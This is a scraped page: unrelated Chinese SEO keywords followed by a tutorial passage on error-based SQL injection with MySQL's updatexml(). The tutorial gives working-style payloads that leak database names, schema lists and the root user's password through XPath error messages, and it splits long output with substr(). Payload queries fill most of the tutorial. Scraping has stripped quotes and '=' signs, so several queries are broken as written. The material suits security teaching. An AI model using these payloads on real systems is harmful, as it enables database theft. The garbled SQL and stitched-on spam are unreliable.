网站带后台免费下载,网站建设延期通知单,嘉兴seo排名外包,宣城市建设银行网站首页《网络安全自学教程》 SQL注入时#xff0c;经常利用updatexml()的报错特性来脱库。 updatexml报错原理 1、updatexml语法参数2、报错原理分析3、使用updatexml()脱库4、分割显示结果 updatexml() 的作用是修改xml文件的内容。
1、updatexml语法参数
updatexml(参数1#x… 《网络安全自学教程》 SQL注入时经常利用updatexml()的报错特性来脱库。 updatexml报错原理 1、updatexml语法参数2、报错原理分析3、使用updatexml()脱库4、分割显示结果 updatexml() 的作用是修改xml文件的内容。
1、updatexml语法参数
updatexml(参数1参数2参数3)
参数1: 文件名比如 a.xm参数2路径比如 contry-city1参数3替换的值内容比如 tianjing
就是把 a.xm 文件中 contry-city1 标签的值改成 tianjing
2、报错原理分析
参数2 的路径必须符合 XML 的 Xpath 语法否则就会报错提示你语法错误并且把报错位置的内容显示出来。
比如我给参数2一个特殊符号~它就会把这个特殊符号显示出来。
如果函数里还有函数他就会先执行里面的那个函数类似小学数学里提到的先算括号内再算括号外利用这个特性我们在updatexml()里插入别的函数。
select updatexml(1,concat(~,database()),3);它会先执行最里面的 database() 查看到前使用的数据库是test。
select updatexml(1,concat(~,test),3);再执行 concat() 拼接成~test。
select updatexml(1,‘~test’,3);再执行updatexml()一看参数2是 ~test不符合Xpath语法就报语法错误停止执行SQL然后把报错位置的参数显示出来。像下图的执行结果那样我们就拿到了当前使用的数据库。 3、使用updatexml()脱库
按照上一步的逻辑在函数中再插入括号括号里写SQL语句就能执行任意SQL比如查看root用户的密码。
select updatexml(1,concat(~,
(select password from user where usernameroot)
),3);插入脱库语法来脱裤。
select updatexml(1,
concat(~,(
select group_concat(schema_name)
from information_schema.schemata
)),3);这里大家能注意到我文章中的SQL故意换行了这个换行不是语法要求是给你自己看的否则嵌套这么多括号很容易写错。
4、分割显示结果
updatexml() 显示的报错内容字符串最大长度是31个字符。脱库的结果显示不全我们可以用 substr() 截取不同位置的字符串分别显示出来。
比如从第1个字符开始截取31个字符。
select updatexml(1,concat(~,
substr(
(select group_concat(schema_name)
from information_schema.schemata)
,1,31)
),3);从第32个字符开始截取31个字符。
select updatexml(1,concat(~,
substr(
(select group_concat(schema_name)
from information_schema.schemata)
,32,31)
),3);直到显示完所有字符。
